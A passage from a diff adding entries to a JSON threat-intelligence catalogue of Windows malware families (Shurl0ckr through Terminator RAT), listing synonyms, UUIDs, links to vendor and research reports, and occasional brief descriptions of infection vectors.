"https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/shurl0ckr-ransomware-as-a-service-peddled-on-dark-web-can-reportedly-bypass-cloud-applications" + ] + }, + "uuid": "f544ee0e-26f4-48e7-aaee-056f4d1ced82", + "value": "Shurl0ckr", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Caphaw" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.shylock", + "https://securityintelligence.com/merchant-of-fraud-returns-shylock-polymorphic-financial-malware-infections-on-the-rise/", + "https://securityintelligence.com/shylocks-new-trick-evading-malware-researchers/", + "https://www.europol.europa.eu/newsroom/news/global-action-targeting-shylock-malware", + "https://www.virusbulletin.com/virusbulletin/2015/02/paper-pluginer-caphaw", + "http://contagiodump.blogspot.com/2011/09/sept-21-greedy-shylock-financial.html", + "https://malwarereversing.wordpress.com/2011/09/27/debugging-injected-code-with-ida-pro/" + ] + }, + "uuid": "515ee69a-298a-4fcf-bdb0-c5fc6d41872f", + "value": "Shylock", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewinder", + "https://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c", + "https://s.tencent.com/research/report/479.html" + ] + }, + "uuid": "3c43bd4c-8c40-47b5-ae97-3dd0f0c0e8d8", + "value": "win.sidewinder", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Destover" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sierras", + "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group", + "https://securingtomorrow.mcafee.com/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/" + ] + }, + "uuid": "da92c927-9b31-48aa-854a-8ed49a29565b", + "value": "Sierra(Alfa,Bravo, ...)", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.siggen6" + ] + }, + "uuid": "c12b3e30-32bf-4b7e-98f6-6a00e95553f8", + "value": "Siggen6", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.silence", + "https://securelist.com/the-silence/83009/", + "http://www.intezer.com/silenceofthemoles/", + "https://www.group-ib.com/resources/threat-research/silence.html" + ] + }, + "uuid": "0df52c23-690b-4703-83f7-5befc38ab376", + "value": "Silence", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.silon", + "http://contagiodump.blogspot.com/2009/11/new-banking-trojan-w32silon-msjet51dll.html", + "http://www.internetnews.com/security/article.php/3846186/TwoHeaded+Trojan+Targets+Online+Banks.htm" + ] + }, + "uuid": "b602edb3-81c2-4772-b5f8-73deb85cb40a", + "value": "Silon", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.siluhdur" + ] + }, + "uuid": "774fcb67-1eeb-4bda-9b36-b624b632417a", + "value": "Siluhdur", + "description": "" + }, + { + "meta": { + "synonyms": [ + "iBank" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.simda", + "https://secrary.com/ReversingMalware/iBank/" + ] + }, + "uuid": "467ee29c-317f-481a-a77c-69961eb88c4d", + "value": "Simda", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Theola", + "Quarian", + "Mebroot", + "Anserin", + "Torpig" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sinowal", + "https://en.wikipedia.org/wiki/Torpig", + "https://www.symantec.com/security_response/writeup.jsp?docid=2008-010718-3448-99&tabid=2", + "https://www.welivesecurity.com/2013/03/13/how-theola-malware-uses-a-chrome-plugin-for-banking-fraud/", + "https://www.virusbulletin.com/virusbulletin/2014/06/sinowal-banking-trojan" + ] + }, + "uuid": "ad5bcaef-1a86-4cc7-8f2e-32306b995018", + "value": "Sinowal", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sisfader", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/june/cve-2017-8750-rtf-and-the-sisfader-rat/", + "https://medium.com/@Sebdraven/gobelin-panda-against-the-bears-1f462d00e3a4" + ] + }, + "uuid": "0fba78fc-47a1-45e1-b5df-71bcabd23b5d", + "value": "Sisfader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.skarab_ransom", + "http://malware-traffic-analysis.net/2017/11/23/index.html" + ] + }, + "uuid": "c1ccba65-e2f0-4f29-8e04-6b119c7f8694", + "value": "Skarab Ransom", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.skyplex" + ] + }, + "uuid": "39002a0d-99aa-4568-b110-48f6df1759cd", + "value": "Skyplex", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.slave", + "https://www.cert.pl/en/news/single/slave-banatrix-and-ransomware/" + ] + }, + "uuid": "1f4d8d42-8f31-47f8-b2b7-2d43196de532", + "value": "Slave", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.slingshot", + "https://securelist.com/apt-slingshot/84312/", + "https://s3-eu-west-1.amazonaws.com/khub-media/wp-content/uploads/sites/43/2018/03/09133534/The-Slingshot-APT_report_ENG_final.pdf", + "https://www.cyberscoop.com/kaspersky-slingshot-isis-operation-socom-five-eyes/" + ] + }, + "uuid": "d6178858-1244-41cf-aeed-8c6afc1d6846", + "value": "Slingshot", + "description": "- 2012 first sighted\r\n- Attack vector via compromised Microtik routers where victim's got infection when they connect to Microtik router admin software - Winbox\r\n- 2018 when discovered by Kaspersky Team\r\n\r\nInfection Vector\r\n- Infected Microtik Router > Malicious DLL (IP4.dll) in Router > User connect via windbox > Malicious DLL downloaded on computer" + }, + { + "meta": { + "synonyms": [ + "speccom" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.smac", + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/Aug.10.The_Italian_Connection_An_analysis_of_exploit_supply_chains_and_digital_quartermasters/HTExploitTelemetry.pdf" + ] + }, + "uuid": "a8561caf-eb9f-4a02-8277-a898a0a259ae", + "value": "smac", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Dofoil" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader", + "https://cloudblogs.microsoft.com/microsoftsecure/2018/04/04/hunting-down-dofoil-with-windows-defender-atp/", + "https://eternal-todo.com/blog/smokeloader-analysis-yulia-photo", + "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html", + "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/", + "https://info.phishlabs.com/blog/smoke-loader-adds-additional-obfuscation-methods-to-mitigate-analysis", + "https://www.spamhaus.org/news/article/774/smoke-loader-improves-encryption-after-microsoft-spoils-its-campaign", + "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet/", + "https://blog.malwarebytes.com/cybercrime/2018/01/fake-spectre-and-meltdown-patch-pushes-smoke-loader/", + "https://int0xcc.svbtle.com/a-taste-of-our-own-medicine-how-smokeloader-is-deceiving-dynamic-configuration-extraction-by-using-binary-code-as-bait", + "https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/", + "https://blog.badtrace.com/post/anti-hooking-checks-of-smokeloader-2018/", + "https://www.cert.pl/en/news/single/dissecting-smoke-loader/" + ] + }, + "uuid": "ba91d713-c36e-4d98-9fb7-e16496a69eec", + "value": "SmokeLoader", + "description": "The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body." + }, + { + "meta": { + "synonyms": [ + "Ismo" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.smominru", + "https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators", + "http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/" + ] + }, + "uuid": "26b91007-a8ae-4e32-bd99-292e44735c3d", + "value": "Smominru", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.snatch_loader", + "https://myonlinesecurity.co.uk/your-order-no-8194788-has-been-processed-malspam-delivers-malware/", + "https://twitter.com/VK_Intel/status/898549340121288704", + "https://www.arbornetworks.com/blog/asert/snatchloader-reloaded/", + "https://zerophagemalware.com/2017/12/11/malware-snatch-loader-reloaded/" + ] + }, + "uuid": "467c726e-6e19-4d15-88b6-362cbe0b3d20", + "value": "SnatchLoader", + "description": "A downloader trojan with some infostealer capabilities focused on the browser. Previously observed as part of RigEK campaigns." + }, + { + "meta": { + "synonyms": [ + "ByeByeShell" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sneepy", + "https://researchcenter.paloaltonetworks.com/2016/09/unit42-confucius-says-malware-families-get-further-by-abusing-legitimate-websites/" + ] + }, + "uuid": "212d1ed7-0519-412b-a1ce-56046ca93372", + "value": "SNEEPY", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Ursnif" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.snifula", + "https://www.circl.lu/assets/files/tr-13/tr-13-snifula-analysis-report-v1.3.pdf" + ] + }, + "uuid": "4f3ad937-bf2f-40cb-9695-a2bedfd41bfa", + "value": "Snifula", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.snojan", + "https://medium.com/@jacob16682/snojan-analysis-bb3982fb1bb9" + ] + }, + "uuid": "0646a6eb-1c13-4d87-878e-9431314597bf", + "value": "Snojan", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.snslocker" + ] + }, + "uuid": "99a10948-d7ba-4ad0-b73c-c7762143a193", + "value": "SNS Locker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sobaken", + "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/" + ] + }, + "uuid": "81e4fc8f-7b05-42bf-8ff9-568362d4f964", + "value": "Sobaken", + "description": "According to ESET, this RAT was derived from (the open-source) Quasar RAT." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.socks5_systemz" + ] + }, + "uuid": "38734f44-ebc4-4250-a20e-5dac0fb5c0ed", + "value": "Socks5 Systemz", + "description": "" + }, + { + "meta": { + "synonyms": [ + "BIRDDOG", + "Nadrac" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.socksbot", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://www.accenture.com/t00010101T000000Z__w__/gb-en/_acnmedia/PDF-83/Accenture-Goldfin-Security-Alert.pdf", + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" + ] + }, + "uuid": "da34bf80-6dc6-4b07-8094-8bed2c1176ec", + "value": "SocksBot", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Napolar" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.solarbot", + "https://www.welivesecurity.com/2013/09/25/win32napolar-a-new-bot-on-the-block/", + "https://blog.malwarebytes.com/threat-analysis/2013/09/new-solarbot-malware-debuts-creator-publicly-advertising/" + ] + }, + "uuid": "d61a1656-9413-46de-bd19-c7fe5eda3371", + "value": "Solarbot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.soraya", + "https://www.codeandsec.com/Soraya-Malware-Analysis-Dropper", + "https://www.arbornetworks.com/blog/asert/the-best-of-both-worlds-soraya/" + ] + }, + "uuid": "26aa3c43-5049-4a2e-bec1-9709b31a1a26", + "value": "soraya", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sorgu", + "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east" + ] + }, + "uuid": "bc135ba5-637b-46c9-94fc-2eef5e018bb5", + "value": "Sorgu", + "description": "" + }, + { + "meta": { + "synonyms": [ + "denis" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.soundbite", + "https://attack.mitre.org/wiki/Software/S0157", + "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html" + ] + }, + "uuid": "f4cac204-3d3f-4bb6-84bd-fc27b2f5158c", + "value": "SOUNDBITE", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.spedear", + "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" + ] + }, + "uuid": "bd29030e-d440-4842-bc2a-c173ed938da4", + "value": "Spedear", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.spora_ransom", + "http://malware-traffic-analysis.net/2017/01/17/index2.html", + "https://github.com/MinervaLabsResearch/SporaVaccination", + "https://www.linkedin.com/pulse/spora-ransomware-understanding-hta-infection-vector-kevin-douglas", + "https://blog.malwarebytes.com/threat-analysis/2017/03/spora-ransomware/", + "https://nakedsecurity.sophos.com/2017/06/26/how-spora-ransomware-tries-to-fool-antivirus/", + "https://www.gdatasoftware.com/blog/2017/01/29442-spora-worm-and-ransomware" + ] + }, + "uuid": "7eeafa7c-0282-4667-bb1a-5ebc3a845d6d", + "value": "Spora", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.spybot" + ] + }, + "uuid": "34e9d701-22a1-4315-891d-443edd077abf", + "value": "SpyBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.spynet_rat" + ] + }, + "uuid": "", + "value": "", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.squirtdanger", + "https://researchcenter.paloaltonetworks.com/2018/04/unit42-squirtdanger-swiss-army-knife-malware-veteran-malware-author-thebottle/" + ] + }, + "uuid": "858a2cdb-9c89-436a-b8d4-60c725c7ac63", + "value": "SquirtDanger", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sslmm", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", + "https://securelist.com/analysis/publications/69953/the-naikon-apt/", + "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf" + ] + }, + "uuid": "009db412-762d-4256-8df9-eb213be01ffd", + "value": "SslMM", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.stabuniq", + "http://contagiodump.blogspot.com/2012/12/dec-2012-trojanstabuniq-samples.html", + "https://www.symantec.com/connect/blogs/trojanstabuniq-found-financial-institution-servers" + ] + }, + "uuid": "faa2196f-df4c-454c-995e-ded7864d5fa8", + "value": "Stabuniq", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.stampedo", + "https://www.bleepingcomputer.com/news/security/stampado-ransomware-campaign-decrypted-before-it-started/" + ] + }, + "uuid": "b1efbadf-26e5-4e35-8fd2-61642c30ecbf", + "value": "Stampedo", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.starcruft", + "https://securelist.com/operation-daybreak/75100/" + ] + }, + "uuid": "acd8fc63-c22a-4c11-907e-33e358fdd293", + "value": "StarCruft", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.starloader", + "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments" + ] + }, + "uuid": "f1decba9-6b3b-4636-a2b6-2208e178591a", + "value": "StarLoader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.starsypound", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "6df9bbd4-ab32-4d09-afdb-97eed274520a", + "value": "StarsyPound", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.stegoloader", + "https://www.secureworks.com/research/stegoloader-a-stealthy-information-stealer" + ] + }, + "uuid": "aea21616-061d-4177-9512-8887853394ed", + "value": "StegoLoader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.stinger" + ] + }, + "uuid": "82ab5235-a71e-4692-a08c-8db337d8b53a", + "value": "Stinger", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.stration" + ] + }, + "uuid": "0439c5ec-306e-4473-84f7-50bdb5539fc2", + "value": "Stration", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.stresspaint", + "https://security.radware.com/malware/stresspaint-malware-targeting-facebook-credentials/", + "https://arstechnica.com/information-technology/2018/04/tens-of-thousands-of-facebook-accounts-compromised-in-days-by-malware/", + "https://blog.radware.com/security/2018/04/stresspaint-malware-campaign-targeting-facebook-credentials/", + "https://www.bleepingcomputer.com/news/security/stresspaint-malware-steals-facebook-credentials-and-session-cookies/" + ] + }, + "uuid": "00dedcea-4f87-4b6d-b12d-7749281b1366", + "value": "Stresspaint", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.strongpity", + "https://securelist.com/blog/research/76147/on-the-strongpity-waterhole-attacks-targeting-italian-and-belgian-encryption-users/", + "https://twitter.com/physicaldrive0/status/786293008278970368", + "https://www.welivesecurity.com/2017/12/08/strongpity-like-spyware-replaces-finfisher/", + "https://citizenlab.ca/2018/03/bad-traffic-sandvines-packetlogic-devices-deploy-government-spyware-turkey-syria/" + ] + }, + "uuid": "da2969f2-01e9-4ca8-b2f3-5fc9a9891d57", + "value": "StrongPity", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.stuxnet", + "http://artemonsecurity.blogspot.de/2017/04/stuxnet-drivers-detailed-analysis.html" + ] + }, + "uuid": "6ad84f52-0025-4a9d-861a-65c870f47988", + "value": "Stuxnet", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sunorcal", + "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/", + "http://pwc.blogs.com/cyber_security_updates/2016/03/index.html" + ] + }, + "uuid": "a51b82ba-7e32-4a8e-b5d0-8d0441bdcce4", + "value": "SunOrcal", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.suppobox" + ] + }, + "uuid": "dd9939a4-df45-4c7c-8a8d-83b40766aacd", + "value": "SuppoBox", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.swift", + "https://securelist.com/blog/sas/77908/lazarus-under-the-hood/" + ] + }, + "uuid": "8420653b-1412-45a1-9a2d-6aa9b9eaf906", + "value": "Swift?", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sword", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "2112870f-06f1-44a9-9c43-6cc4fb90e295", + "value": "Sword", + "description": "" + }, + { + "meta": { + "synonyms": [ + "getkys" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sykipot", + "https://www.symantec.com/connect/blogs/sykipot-attacks", + "https://blog.trendmicro.com/trendlabs-security-intelligence/sykipot-now-targeting-us-civil-aviation-sector-information/", + "https://www.alienvault.com/blogs/labs-research/sykipot-is-back", + "https://community.rsa.com/thread/185437" + ] + }, + "uuid": "99ffeb75-8d21-43a2-b5f7-f58bcbac2228", + "value": "sykipot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.synack", + "https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/" + ] + }, + "uuid": "a396a0bb-6dc5-424a-bdbd-f8ba808ca2c2", + "value": "SynAck", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.synccrypt", + "https://www.bleepingcomputer.com/news/security/synccrypt-ransomware-hides-inside-jpg-files-appends-kk-extension/" + ] + }, + "uuid": "e717a26d-17aa-4cd7-88de-dc75aa365232", + "value": "SyncCrypt", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.synflooder", + "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + ] + }, + "uuid": "d327b4d9-e1c8-4c71-b9fe-775d1607e7d4", + "value": "SynFlooder", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.synth_loader" + ] + }, + "uuid": "ffd74637-b518-4622-939b-c0669a81f3a9", + "value": "Synth Loader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sys10", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", + "https://securelist.com/analysis/publications/69953/the-naikon-apt/", + "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf" + ] + }, + "uuid": "2ae57534-6aac-4025-8d93-888dab112b45", + "value": "Sys10", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.syscon", + "http://blog.trendmicro.com/trendlabs-security-intelligence/syscon-backdoor-uses-ftp-as-a-cc-channel/", + "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/" + ] + }, + "uuid": "4f079a71-bb1b-47b6-a6d0-26a37cd8a3a6", + "value": "Syscon", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysget", + "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/" + ] + }, + "uuid": "a4b9c526-42d0-4de9-ab8e-e78f99655d11", + "value": "SysGet", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysscan" + ] + }, + "uuid": "7007b268-f6f4-4a01-9184-fc2334461c38", + "value": "SysScan", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.szribi", + "https://www.fireeye.com/blog/threat-research/2008/11/technical-details-of-srizbis-domain-generation-algorithm.html", + "https://www.secureworks.com/research/srizbi", + "https://www.virusbulletin.com/virusbulletin/2007/11/spam-kernel" + ] + }, + "uuid": "66b1094f-7779-43ad-a32b-a9414babcc76", + "value": "Szribi", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tabmsgsql", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "48aa9c41-f420-418b-975c-1fb6e2a91145", + "value": "TabMsgSQL", + "description": "" + }, + { + "meta": { + "synonyms": [ + "simbot" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.taidoor", + "https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html", + "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf", + "http://contagiodump.blogspot.com/2011/10/sep-28-cve-2010-3333-manuscript-with.html" + ] + }, + "uuid": "94323b32-9566-450b-8480-5f9f53b57948", + "value": "taidoor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.taleret", + "https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html", + "http://contagioexchange.blogspot.com/2013/08/taleret-strings-apt-1.html" + ] + }, + "uuid": "b0467c03-824f-4071-8668-f056110d2a50", + "value": "Taleret", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tandfuy" + ] + }, + "uuid": "88ff523e-206b-4918-8c93-e2829427eef2", + "value": "Tandfuy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tapaoux", + "https://securelist.com/files/2014/11/darkhotel_kl_07.11.pdf" + ] + }, + "uuid": "71e77349-98f5-49c6-bff7-6ed3b3d79410", + "value": "Tapaoux", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tarsip", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "ea6a62b2-db33-4d60-9823-5117c20b6457", + "value": "Tarsip", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tdiscoverer", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf" + ] + }, + "uuid": "bbbf4786-1aba-40ac-8ad7-c9d8c66197a8", + "value": "tDiscoverer", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tdtess", + "http://www.clearskysec.com/tulip/" + ] + }, + "uuid": "99d83ee8-6870-4af2-a3c8-cf86baff7cb3", + "value": "TDTESS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.telebot", + "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/" + ] + }, + "uuid": "06e0d676-8160-4b65-b6ea-d7634c962809", + "value": "TeleBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.teledoor", + "https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/", + "http://blog.talosintelligence.com/2017/07/the-medoc-connection.html" + ] + }, + "uuid": "b71f1656-975a-4daa-8109-00c30fd20410", + "value": "TeleDoor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tempedreve" + ] + }, + "uuid": "26b2c2c0-036e-4e3a-a465-71a391046b74", + "value": "Tempedreve", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Fakem RAT" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.terminator_rat", + "https://www.welivesecurity.com/wp-content/uploads/2014/01/Advanced-Persistent-Threats.pdf", + "https://malware.lu/assets/files/articles/RAP002_APT1_Technical_backstage.1.0.pdf", + "https://documents.trendmicro.com/assets/wp/wp-fakem-rat.pdf", + "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html" + ] + }, + "uuid": "b127028b-ecb1-434b-abea-e4df3ca458b9", + "value": "Terminator 